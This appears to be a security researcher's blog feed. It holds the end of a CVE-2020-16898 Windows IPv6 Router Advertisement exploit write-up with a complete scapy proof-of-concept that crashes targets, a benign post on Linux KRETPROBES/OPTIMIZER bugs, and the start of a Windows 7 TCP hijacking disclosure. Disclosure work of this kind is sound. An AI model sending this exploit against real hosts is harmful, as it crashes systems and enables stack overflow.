pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

This never hits the tcpip!Ipv6pUpdateRDNSS function.

Problem 3 – size of the packet

After debugging, I realized that we are failing the following check:

fffff804`483ba766 418b4618        mov     eax,dword ptr [r14+18h]
fffff804`483ba76a 413bc7          cmp     eax,r15d
fffff804`483ba76d 0f85d0810b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb85ab (fffff804`48472943)

where eax is the size of the packet and r15 keeps track of how much data has been consumed. In this specific case we have:

rax = 0x48
r15 = 0x40

This is exactly an 8-byte difference because we use an even number. To bypass it, I placed another header just after the last one. However, I was still hitting the same problem 🙁 It took me some time to figure out how to play with the packet layout to bypass it, but I finally managed to do so.
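The two values from the debugger can be reproduced with a small model of a length-validation walk. This is a sketch under assumptions: the walk advances by Length * 8 and stops at the first option that does not fit, the fixed part of a Router Advertisement is taken as 16 bytes, and the function name is made up. The real driver logic may differ in detail.

```python
RA_HEADER_SIZE = 16  # fixed part of an ICMPv6 Router Advertisement

def validation_walk(options: bytes):
    """Walk options by Length * 8; return (consumed, total) incl. RA header."""
    offset = 0
    while offset + 2 <= len(options):
        step = options[offset + 1] * 8
        if step == 0 or offset + step > len(options):
            break                      # option is invalid or does not fit
        offset += step
    return RA_HEADER_SIZE + offset, RA_HEADER_SIZE + len(options)

# RDNSS header (Type 25, Length 6) followed by three 16-byte addresses.
# The third address carries 0x03 0xAA in its second half, as in the test above.
addr = bytes.fromhex("aa" * 16)
third = bytes.fromhex("aa" * 8 + "03aa" + "aa" * 6)
options = bytes([25, 6, 0, 0]) + b"\xff" * 4 + addr + addr + third
consumed, total = validation_walk(options)
print(hex(consumed), hex(total))  # prints 0x40 0x48
```

The 8 trailing bytes start with Type 0x03 and Length 0xAA, which claims far more data than is left, so the walk ends 8 bytes short of the packet size.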

Problem 4 – size again!

Finally, I found the correct packet layout and should have ended up in the code responsible for handling the Route Information header. However, I did not 🙂 Here is why. After returning from the RDNSS handler I ended up here:

fffff804`48472cba e875780b00      call    tcpip!Ipv6pUpdateRDNSS (fffff804`4852a534)
fffff804`48472cbf 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472cc5 e9c980f4ff      jmp     tcpip!Ipv6pHandleRouterAdvertisement+0x9fb (fffff804`483bad93)
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
fffff804`483bad21 0fb64801        movzx   ecx,byte ptr [rax+1]
fffff804`483bad25 66c1e103        shl     cx,3
fffff804`483bad29 66894c2462      mov     word ptr [rsp+62h],cx
fffff804`483bad2e 6685c9          test    cx,cx
fffff804`483bad31 0f8485060000    je      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)
fffff804`483bad37 0fb7c9          movzx   ecx,cx
fffff804`483bad3a 413b4e18        cmp     ecx,dword ptr [r14+18h] ds:002b:ffffcb82`fcbed1c8=000000b8
fffff804`483bad3e 0f8778060000    ja      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)

ecx keeps the “Length” of the “fake header” multiplied by 8 (shl cx,3), while [r14+18h] holds the size of the data left in the packet. I set Length to the maximum (0xFF), which multiplied by 8 gives 2040 (0x7f8). However, there are only 0xb8 bytes left. So, I failed another size validation!

To fix it, I decreased the size of the “fake header” and at the same time attached more data to the packet. That worked!
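The check from the listing above can be written down as a one-line predicate, which makes it easy to see which Length values fit a given amount of remaining data. The function name is made up for this sketch.

```python
def fake_option_fits(length_field: int, bytes_left: int) -> bool:
    """(Length << 3) must be non-zero and not exceed the data left."""
    size = (length_field << 3) & 0xFFFF   # shl cx, 3
    return size != 0 and size <= bytes_left

print(hex(0xFF << 3), fake_option_fits(0xFF, 0xB8))  # prints 0x7f8 False
print(0xB8 // 8)                                     # prints 23
```

With 0xb8 bytes left, the largest Length that passes is 23. To use a bigger fake Length, more data has to be appended to the packet.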

Problem 5 – NdisGetDataBuffer() and fragmentation

I had finally found all the puzzle pieces needed to trigger the bug. Or so I thought… I ended up executing the following code responsible for handling the Route Information option:

fffff804`48472cd9 33c0            xor     eax,eax
fffff804`48472cdb 44897c2420      mov     dword ptr [rsp+20h],r15d
fffff804`48472ce0 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472ce6 4c8d85b8010000  lea     r8,[rbp+1B8h]
fffff804`48472ced 418bd7          mov     edx,r15d
fffff804`48472cf0 488985b8010000  mov     qword ptr [rbp+1B8h],rax
fffff804`48472cf7 448bcf          mov     r9d,edi
fffff804`48472cfa 488985c0010000  mov     qword ptr [rbp+1C0h],rax
fffff804`48472d01 498bce          mov     rcx,r14
fffff804`48472d04 488985c8010000  mov     qword ptr [rbp+1C8h],rax
fffff804`48472d0b 48898580010000  mov     qword ptr [rbp+180h],rax
fffff804`48472d12 48898588010000  mov     qword ptr [rbp+188h],rax
fffff804`48472d19 4c8b1558041300  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0

It tries to get “Length” bytes from the packet to read the entire header. However, Length is fake and not validated. In my test case it has the value 0x100. The destination address points to the stack buffer which represents the Route Information header. It is a very small buffer. So, we should have a classic stack buffer overflow, but inside the NdisGetDataBuffer function I ended up executing this:

fffff804`4820e10c 8b7910          mov     edi,dword ptr [rcx+10h]
fffff804`4820e10f 8b4328          mov     eax,dword ptr [rbx+28h]
fffff804`4820e112 8bf2            mov     esi,edx
fffff804`4820e114 488d0c3e        lea     rcx,[rsi+rdi]
fffff804`4820e118 483bc8          cmp     rcx,rax
fffff804`4820e11b 773e            ja      fffff804`4820e15b
fffff804`4820e11d f6430a05        test    byte ptr [rbx+0Ah],5 ds:002b:ffffcb83`086a4c7a=0c
fffff804`4820e121 0f84813f0400    je      fffff804`482520a8
fffff804`4820e127 488b4318        mov     rax,qword ptr [rbx+18h]
fffff804`4820e12b 4885c0          test    rax,rax
fffff804`4820e12e 742b            je      fffff804`4820e15b
fffff804`4820e130 8b4c2470        mov     ecx,dword ptr [rsp+70h]
fffff804`4820e134 8d55ff          lea     edx,[rbp-1]
fffff804`4820e137 4803c7          add     rax,rdi
fffff804`4820e13a 4823d0          and     rdx,rax
fffff804`4820e13d 483bd1          cmp     rdx,rcx
fffff804`4820e140 7519            jne     fffff804`4820e15b
fffff804`4820e142 488b5c2450      mov     rbx,qword ptr [rsp+50h]
fffff804`4820e147 488b6c2458      mov     rbp,qword ptr [rsp+58h]
fffff804`4820e14c 488b742460      mov     rsi,qword ptr [rsp+60h]
fffff804`4820e151 4883c430        add     rsp,30h
fffff804`4820e155 415f            pop     r15
fffff804`4820e157 415e            pop     r14
fffff804`4820e159 5f              pop     rdi
fffff804`4820e15a c3              ret
fffff804`4820e15b 4d85f6          test    r14,r14

In the first ‘cmp’ instruction, the rcx register keeps the value of the requested size. The rax register keeps some huge number, and because of that I could never jump out of that logic. As a result of that call, I was getting back a different address than the local stack address, and no overflow happened. I didn’t know what was going on… So, I started to read the documentation of this function, and here is the magic:

“If the requested data in the buffer is contiguous, the return value is a pointer to a location that NDIS provides. If the data is not contiguous, NDIS uses the Storage parameter as follows:
If the Storage parameter is non-NULL, NDIS copies the data to the buffer at Storage. The return value is the pointer passed to the Storage parameter.
If the Storage parameter is NULL, the return value is NULL.”
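The documented behaviour can be illustrated with a toy model. Everything here is hypothetical: the function takes a list of byte chunks instead of a NET_BUFFER, has a different signature than the real NdisGetDataBuffer, and a growing bytearray stands in for memory being overwritten past the end of a small buffer.

```python
def get_data_buffer(fragments, offset, count, storage):
    """Toy model of the quoted behaviour; returns (data, copied)."""
    if offset + count > sum(len(f) for f in fragments):
        return None, False             # not enough data in the packet
    start = 0
    for frag in fragments:
        end = start + len(frag)
        if start <= offset and offset + count <= end:
            # Contiguous: hand back a view into the packet, storage untouched.
            return memoryview(frag)[offset - start:offset - start + count], False
        start = end
    if storage is None:
        return None, False
    # Not contiguous: copy into the caller's storage. The size of storage is
    # not known here, so the caller must provide at least `count` bytes.
    flat = b"".join(fragments)
    storage[:count] = flat[offset:offset + count]
    return storage, True

packet = bytes(range(256)) * 2
stack_buf = bytearray(32)              # small "on-stack" buffer
_, copied = get_data_buffer([packet], 0, 0x100, stack_buf)
print(copied, len(stack_buf))          # prints False 32
_, copied = get_data_buffer([packet[:200], packet[200:]], 0, 0x100, stack_buf)
print(copied, len(stack_buf))          # prints True 256
```

When the requested range sits in one chunk, the small buffer is never written to. Only when the range spans two chunks does the copy happen, and with an unvalidated size it writes 0x100 bytes into a 32-byte buffer.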

Here we go… Our big packet is kept somewhere in NDIS, and a pointer to that data is returned instead of the data being copied to the local buffer on the stack. I started to Google whether anyone had already hit that problem and… of course yes 🙂 Looking at this link:

http://newsoft-tech.blogspot.com/2010/02/

we can learn that the simplest solution is to fragment the packet. This is exactly what I did and….

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x00000139
                       (0x0000000000000002,0xFFFFF80448A662E0,0xFFFFF80448A66238,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`45bca210 cc              int     3
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a65818 fffff804`45ca9922 nt!DbgBreakPointWithStatus
01 fffff804`48a65820 fffff804`45ca9017 nt!KiBugCheckDebugBreak+0x12
02 fffff804`48a65880 fffff804`45bc24c7 nt!KeBugCheck2+0x947
03 fffff804`48a65f80 fffff804`45bd41e9 nt!KeBugCheckEx+0x107
04 fffff804`48a65fc0 fffff804`45bd4610 nt!KiBugCheckDispatch+0x69
05 fffff804`48a66100 fffff804`45bd29a3 nt!KiFastFailDispatch+0xd0
06 fffff804`48a662e0 fffff804`4844ac25 nt!KiRaiseSecurityCheckFailure+0x323
07 fffff804`48a66478 fffff804`483bb487 tcpip!_report_gsfailure+0x5
08 fffff804`48a66480 aaaaaaaa`aaaaaaaa tcpip!Ipv6pHandleRouterAdvertisement+0x10ef
09 fffff804`48a66830 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0a fffff804`48a66838 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0b fffff804`48a66840 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0c fffff804`48a66848 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0d fffff804`48a66850 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0e fffff804`48a66858 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0f fffff804`48a66860 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
10 fffff804`48a66868 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
11 fffff804`48a66870 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
12 fffff804`48a66878 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
13 fffff804`48a66880 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
14 fffff804`48a66888 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
...

Here we go! 🙂

Proof-of-Concept

Code can be found here:

http://site.pi3.com.pl/exp/p_CVE-2020-16898.py

#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
#

from scapy.all import *

v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA()

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
    send(p)

Thanks,
Adam

The short story of broken KRETPROBES and OPTIMIZER in Linux Kernel

15 December 2020 at 19:34
By: pi3

The short story of broken KRETPROBES and OPTIMIZER in Linux Kernel.

During the LKRG development process I’ve found that:

  • KRETPROBES have been broken since kernel 5.8 (fixed in an upcoming kernel)
  • OPTIMIZER has not been doing a sufficient job since kernel 5.5

First things first – KPROBES and FTRACE:

Linux kernel provides 2 amazing frameworks for hooking – K*PROBES and FTRACE. K*PROBES is the older, classic one – introduced in 2.6.9 (October 2004). FTRACE is a newer interface and might have smaller overhead compared to K*PROBES. I’m using the word “K*PROBES” because various types of K*PROBES have been available in the kernel, including JPROBES, KRETPROBES and classic KPROBES. K*PROBES essentially make it possible to dynamically break into any kernel routine. What are the differences between the various K*PROBES?

  • KPROBES – can be placed on virtually any instruction in the kernel
  • JPROBES – were implemented using KPROBES. The main idea behind JPROBES was to employ a simple mirroring principle to allow seamless access to the probed function’s arguments. However, JPROBES have been deprecated since 2017. More information can be found here:
    https://lwn.net/Articles/735667/
  • KRETPROBES – sometimes called “return probes”; they also use KPROBES under the hood. KRETPROBES make it easy to execute the user’s own routine on the entry to and the return from the hooked function. However, KRETPROBES can’t be placed on arbitrary instructions.

When a KPROBE is registered, it makes a copy of the probed instruction and replaces the first byte(s) of the probed instruction with a breakpoint instruction (e.g., int3 on i386 and x86_64).
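The breakpoint patching described above can be pictured with a toy user-space model. This is only a sketch: `ToyKprobe`, `arm` and `disarm` are hypothetical names, the byte string is a made-up stand-in for a probed function, and the real kernel also has to execute the saved instruction afterwards, which is not modeled here.

```python
INT3 = 0xCC  # x86 breakpoint opcode


class ToyKprobe:
    """Toy model: keep a copy of the original byte, patch in a breakpoint."""

    def __init__(self, text: bytearray, offset: int):
        self.text = text
        self.offset = offset
        self.saved = None  # copy of the original first byte

    def arm(self) -> None:
        self.saved = self.text[self.offset]
        self.text[self.offset] = INT3

    def disarm(self) -> None:
        self.text[self.offset] = self.saved
        self.saved = None


# "push %rbp; mov %rsp,%rbp; ret" as a stand-in for a probed function
code = bytearray(b"\x55\x48\x89\xe5\xc3")
probe = ToyKprobe(code, 0)
probe.arm()
armed = bytes(code)      # first byte is now the breakpoint
probe.disarm()
restored = bytes(code)   # original byte is back
```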

FTRACE is newer than K*PROBES and was initially introduced in kernel 2.6.27, which was released on October 9, 2008. FTRACE works completely differently: the main idea is to instrument every compiled function (injecting a “long-NOP” instruction – GCC’s option “-pg”). When FTRACE is registered on a specific function, the “long-NOP” is replaced with a JUMP instruction which points to the trampoline code. That trampoline can then execute any pre-registered user-defined hook.

A few words about Linux Kernel Runtime Guard (LKRG)

In short, LKRG performs runtime integrity checking of the Linux kernel (similar to PatchGuard technology from Microsoft) and detection of the various exploits against the kernel. LKRG attempts to post-detect and promptly respond to unauthorized modifications to the running Linux kernel (system integrity) or to corruption of the task integrity such as credentials (user/group IDs), SECCOMP/sandbox rules, namespaces, and more.
To be able to implement such functionality, LKRG must place various hooks in the kernel. KRETPROBES are used to fulfill that requirement.

LKRG’s KPROBE on FTRACE instrumented functions

A careful reader might ask an interesting question: what will happen if the function is instrumented by the FTRACE (injected “long-NOP”) and someone registers K*PROBES on it? Does dynamically registered FTRACE “overwrite” K*PROBES installed on that function and vice versa?

Well, this is a very common situation from LKRG’s perspective, since it is placing KRETPROBES on many syscalls. Linux kernel uses a special type of K*PROBES in such case and it is called “FTRACE-based KPROBES”. Essentially, such special KPROBE is using FTRACE infrastructure and has very little to do with KPROBES itself. That’s interesting because it is also subject to FTRACE rules e.g. if you disable FTRACE infrastructure, such special KPROBE won’t work either.

OPTIMIZER

Linux kernel developers went one step further and they aggressively “optimize” all K*PROBES to use FTRACE instead. The main reason behind that is performance – FTRACE has smaller overhead. If for any reason such a KPROBE can’t be optimized, then the classic old-school KPROBES infrastructure is used.

When you analyze all KRETPROBES placed by LKRG, you will realize that on modern kernels all of them are being converted to some type of FTRACE 🙂

LKRG reports False Positives

After such a long introduction, we can finally move on to the topic of this article. Vitaly Chikunov from ALT Linux reported that when he runs the FTRACE stress tester, LKRG reports corruption of the .text section:

https://github.com/openwall/lkrg/issues/12

I spent a few weeks (month+) on making LKRG detect and accept authorized third-party modifications to the kernel’s code placed via FTRACE. When I finally finished that work, I realized that additionally, I need to protect the global FTRACE knob (sysctl kernel.ftrace_enabled), which allows root to completely disable FTRACE on a running system. Otherwise, LKRG’s hooks might be unknowingly disabled, which not only disables its protections (kind of OK under a threat model where we trust host root), but may also lead to false positives (as without the hooks LKRG wouldn’t know which modifications are legitimate). I’ve added that functionality, and everything was working fine…
… until kernel 5.9. This completely surprised me. I had not seen any significant changes between 5.8.x and 5.9.x in the FTRACE logic. I spent some time on that and finally realized that my protection of the global FTRACE knob stopped working on the latest kernels (since 5.9). However, this code was not changed between kernel 5.8.x and 5.9.x. What’s the mystery?

First problem – KRETPROBES are broken.

Starting from kernel 5.8 all non-optimized KRETPROBES don’t work. Until 5.8, when #DB exception was raised, entry to the NMI was not fully performed. Among others, the following logic was executed:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L589

if (!user_mode(regs)) {
    rcu_nmi_enter();
    preempt_disable();
}

In some older kernels function ist_enter() was called instead. Inside this function we can see the following logic:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L91

if (user_mode(regs)) {
    RCU_LOCKDEP_WARN(!rcu_is_watching(), "entry code didn't wake RCU");
} else {
    /*
     * We might have interrupted pretty much anything.  In
     * fact, if we're a machine check, we can even interrupt
     * NMI processing.  We don't want in_nmi() to return true,
     * but we need to notify RCU.
     */
    rcu_nmi_enter();
}

preempt_disable();

As the comment says “We don’t want in_nmi() to return true, but we need to notify RCU.“. However, since kernel 5.8 the logic of how interrupts are handled was modified and currently we have this (function “exc_int3“):
https://elixir.bootlin.com/linux/v5.8/source/arch/x86/kernel/traps.c#L630

/*
 * idtentry_enter_user() uses static_branch_{,un}likely() and therefore
 * can trigger INT3, hence poke_int3_handler() must be done
 * before. If the entry came from kernel mode, then use nmi_enter()
 * because the INT3 could have been hit in any context including
 * NMI.
 */
if (user_mode(regs)) {
    idtentry_enter_user(regs);
    instrumentation_begin();
    do_int3_user(regs);
    instrumentation_end();
    idtentry_exit_user(regs);
} else {
    nmi_enter();
    instrumentation_begin();
    trace_hardirqs_off_finish();
    if (!do_int3(regs))
        die("int3", regs, 0);
    if (regs->flags & X86_EFLAGS_IF)
        trace_hardirqs_on_prepare();
    instrumentation_end();
    nmi_exit();
}

The root of this unlucky change is the following commit:

https://github.com/torvalds/linux/commit/0d00449c7a28a1514595630735df383dec606812#diff-51ce909c2f65ed9cc668bc36cc3c18528541d8a10e84287874cd37a5918abae5

which was later modified by this commit:

https://github.com/torvalds/linux/commit/8edd7e37aed8b9df938a63f0b0259c70569ce3d2

and this is what we currently have in all kernels since 5.8. Essentially, KRETPROBES are not working since these commits. We have the following logic:

asm_exc_int3() -> exc_int3():
                    |
    ----------------|
    |
    v
...
nmi_enter();
...
if (!do_int3(regs))
       |
  -----|
  |
  v
do_int3() -> kprobe_int3_handler():
                    |
    ----------------|
    |
    v
...
if (!p->pre_handler || !p->pre_handler(p, regs))
                             |
    -------------------------|
    |
    v
...
pre_handler_kretprobe():
...
    if (unlikely(in_nmi())) {
        rp->nmissed++;
        return 0;
    }

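Essentially, exc_int3() calls nmi_enter(), and pre_handler_kretprobe(), before invoking any registered KRETPROBE handler, checks via in_nmi() that it is not running in NMI context. Because nmi_enter() has just been called, in_nmi() returns true, so the probe is only counted as missed (nmissed) and the user’s handler never runs.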
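The interaction can be reproduced in a toy model. This is a rough sketch, not kernel code: `ToyCpu`, `ToyKretprobe`, `int3_old` and `int3_new` are hypothetical names, and the only thing modeled is whether in_nmi() is true at the moment the kretprobe pre-handler runs.

```python
class ToyCpu:
    def __init__(self):
        self.nmi_depth = 0  # stands in for the NMI bits of preempt_count

    def in_nmi(self) -> bool:
        return self.nmi_depth > 0


class ToyKretprobe:
    def __init__(self):
        self.nmissed = 0
        self.hits = 0


def pre_handler_kretprobe(cpu, rp):
    # Mirrors the in_nmi() bail-out quoted above.
    if cpu.in_nmi():
        rp.nmissed += 1
        return 0
    rp.hits += 1  # the user's entry handler would run here
    return 0


def int3_old(cpu, rp):
    # Pre-5.8 style entry: RCU is notified, but in_nmi() stays false.
    pre_handler_kretprobe(cpu, rp)


def int3_new(cpu, rp):
    # 5.8 style entry from kernel mode: nmi_enter() ... nmi_exit().
    cpu.nmi_depth += 1
    try:
        pre_handler_kretprobe(cpu, rp)
    finally:
        cpu.nmi_depth -= 1


cpu = ToyCpu()
old, new = ToyKretprobe(), ToyKretprobe()
for _ in range(3):
    int3_old(cpu, old)
    int3_new(cpu, new)
```

In this model every hit taken through the old path reaches the handler, while every hit taken through the new path ends up in nmissed.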

I’ve reported this issue to the maintainers and it was addressed and correctly fixed. These patches are going to be backported to the stable tree (and hopefully to LTS kernels as well):

https://lists.openwall.net/linux-kernel/2020/12/09/1313

However, coming back to the original problem with LKRG… I didn’t see any issues with kernel 5.8.x, only with 5.9.x. It’s interesting because KRETPROBES were broken in 5.8.x as well. So what’s going on?

As I mentioned at the beginning of the article, K*PROBES are aggressively optimized and converted to FTRACE. In kernel 5.8.x LKRG’s hook was correctly optimized and didn’t use KRETPROBES at all. That’s why I didn’t see any problems with this version. However, for some reason, such optimization was not possible in kernel 5.9.x. This results in placing classic non-optimized KRETPROBES, which we know are broken.

Second problem – OPTIMIZER isn’t doing a sufficient job anymore.

I didn’t see any changes in the sources regarding the OPTIMIZER, nor in the hooked function itself. However, when I looked at the generated vmlinux binary, I saw that GCC generated padding at the end of the hooked function using the INT3 opcode:

...
ffffffff8130528b:       41 bd f0 ff ff ff       mov    $0xfffffff0,%r13d
ffffffff81305291:       e9 fe fe ff ff          jmpq   ffffffff81305194
ffffffff81305296:       cc                      int3
ffffffff81305297:       cc                      int3
ffffffff81305298:       cc                      int3
ffffffff81305299:       cc                      int3
ffffffff8130529a:       cc                      int3
ffffffff8130529b:       cc                      int3
ffffffff8130529c:       cc                      int3
ffffffff8130529d:       cc                      int3
ffffffff8130529e:       cc                      int3
ffffffff8130529f:       cc                      int3

Such padding didn’t exist in this function in generated images for older kernels. Nevertheless, such padding is pretty common.

OPTIMIZER logic fails here:

try_to_optimize_kprobe() -> alloc_aggr_kprobe() -> __prepare_optimized_kprobe()
-> arch_prepare_optimized_kprobe() -> can_optimize():
/* Decode instructions */
addr = paddr - offset;
while (addr < paddr - offset + size) { /* Decode until function end */
    unsigned long recovered_insn;
    if (search_exception_tables(addr))
        /*
         * Since some fixup code will jumps into this function,
         * we can't optimize kprobe in this function.
         */
        return 0;
    recovered_insn = recover_probed_instruction(buf, addr);
    if (!recovered_insn)
        return 0;
    kernel_insn_init(&insn, (void *)recovered_insn, MAX_INSN_SIZE);
    insn_get_length(&insn);
    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;
    /* Recover address */
    insn.kaddr = (void *)addr;
    insn.next_byte = (void *)(addr + insn.length);
    /* Check any instructions don't jump into target */
    if (insn_is_indirect_jump(&insn) ||
        insn_jump_into_range(&insn, paddr + INT3_INSN_SIZE,
                 DISP32_SIZE))
        return 0;
    addr += insn.length;
}

One of the checks tries to protect from the situation when another subsystem puts a breakpoint there as well:

    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;

However, that’s not the case here. INT3_INSN_OPCODE is placed at the end of the function as padding.
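The difference between “a breakpoint planted by someone” and “INT3 used as trailing padding” can be sketched on a simplified model in which a function is just a list of first opcode bytes, one per decoded instruction. Both function names below are hypothetical, and the padding-aware variant is only one possible way to tell the two cases apart; it is not claimed to be what the upstream fix does.

```python
INT3 = 0xCC


def can_optimize_strict(opcodes):
    """Model of the quoted check: any INT3 in the function blocks optimization."""
    return all(op != INT3 for op in opcodes)


def can_optimize_padding_aware(opcodes):
    """Hypothetical variant: INT3 is tolerated if only INT3 follows to the end."""
    for i, op in enumerate(opcodes):
        if op == INT3:
            return all(rest == INT3 for rest in opcodes[i:])
    return True


# mov, jmpq, then ten bytes of INT3 padding (as in the listing above)
padded = [0x41, 0xE9] + [INT3] * 10
# a breakpoint in the middle of real code
probed = [0x41, INT3, 0xE9]

strict_padded = can_optimize_strict(padded)        # rejected by the strict check
aware_padded = can_optimize_padding_aware(padded)  # accepted as padding
aware_probed = can_optimize_padding_aware(probed)  # still rejected
```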
I wanted to find out why INT3 padding is more common in the new kernels while it’s not the case for older ones even though I’m using exactly the same compiler and linker. I’ve started browsing commits and I’ve found this one:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7705dc8557973d8ad8f10840f61d8ec805695e9e

diff --git a/arch/x86/kernel/vmlinux.lds.S b/arch/x86/kernel/vmlinux.lds.S
index b06d6e1188deb..3a1a819da1376 100644
--- a/arch/x86/kernel/vmlinux.lds.S
+++ b/arch/x86/kernel/vmlinux.lds.S
@@ -144,7 +144,7 @@ SECTIONS
 		*(.text.__x86.indirect_thunk)
 		__indirect_thunk_end = .;
 #endif
-	} :text = 0x9090
+	} :text =0xcccc
 
 	/* End of text section, which should occupy whole number of pages */
 	_etext = .;

It looks like INT3 is now a default padding used by the linker.

I’ve brought up that problem with the Linux kernel developers (KPROBES owners), and Masami Hiramatsu prepared an appropriate patch which fixes the problem:

https://lists.openwall.net/linux-kernel/2020/12/11/265

I’ve verified it and now it works well. Thanks to LKRG development work we helped identify and fix two interesting problems in Linux kernel 🙂

Thanks,
Adam

Windows 7 TCP/IP hijacking

24 January 2021 at 18:18
By: pi3

Blind TCP/IP hijacking is still alive on Windows 7… and not only. This version of Windows is certainly one of the “juiciest” targets even though January 14th 2020 was the official EOL (End Of Life) for it. Based on various data Windows 7 holds around 25% share of the Operating Systems (OS) market and is still the world’s second most popular desktop operating system.

A little bit of history

It was a few months before I joined Microsoft as a Security Software Engineer in 2012 when I sent them a report with an interesting bug/vulnerability in all versions of Microsoft Windows including Windows 7 (the latest version at that time). It was an issue in the implementation of TCP/IP stack allowing attackers to carry out a blind TCP/IP hijacking attack. During my discussion with MSRC (Microsoft Security Response Center) they acknowledged the bug exists, but they had their doubts about the impact of the issue claiming “it is very difficult and very unreliable” to exploit. Therefore, they were not going to address it in the current OSes. However, they would fix it in the upcoming OS which was going to be released soon (Windows 8).

I didn’t agree with MSRC’s evaluation. In 2008 I developed a fully working PoC which would automatically find all the necessary primitives (client’s port, SQN and ACK) to perform a blind TCP/IP hijacking attack. This tool was exploiting exactly the same weaknesses in the TCP/IP stack which I had reported. That being said, Microsoft informed me that if I shared my tool (I didn’t want to do it), they would reconsider their decision. However, for now, no CVE would be allocated, and this problem was supposed to be addressed in Windows 8.

In the following months I started my work as an FTE (Full Time Employee) for Microsoft, and I verified that this problem was fixed in Windows 8.  Over the course of years, I completely forgot about it. Nevertheless, when I left Microsoft, I was doing some cleanups on my old laptop and found my old tool. I copied it from the laptop and decided to revisit it once I had a bit more time. I found some time and thought that my tool deserved a release and a proper description.

What is TCP/IP hijacking?

Most likely the majority of readers are aware of what this is. For those who aren’t, I encourage you to read the many great articles about it which you can find on the internet these days.

It might be worth mentioning that probably the most famous blind TCP/IP hijacking attack was done by Kevin Mitnick against the computers of Tsutomu Shimomura at the San Diego Supercomputer Center on Christmas Day, 1994.

This is a VERY old-school technique which nobody expects to be alive in 2021… Yet, it’s still possible to perform TCP/IP session hijacking today without attacking the PRNG responsible for generating the initial TCP sequence numbers (ISN).

What is the impact of TCP/IP hijacking nowadays?

(Un)fortunately it is not as catastrophic as it used to be. The main reason is that the majority of modern protocols implement encryption. Sure, it’s overwhelmingly bad if an attacker can hijack any established TCP/IP session. However, if the upper-layer protocols properly implement encryption, attackers are limited in terms of what they can do with it, unless they are able to generate correctly encrypted messages.

That being said, we still have widely deployed protocols which do not encrypt the traffic, e.g., FTP, SMTP, HTTP, DNS, IMAP, and more. Thankfully, protocols like Telnet or Rlogin (hopefully?) can be seen only in the museum.

Where is the bug?

TL;DR: In the implementation of TCP/IP stack for Windows 7, IP_ID is a global counter.

Details:

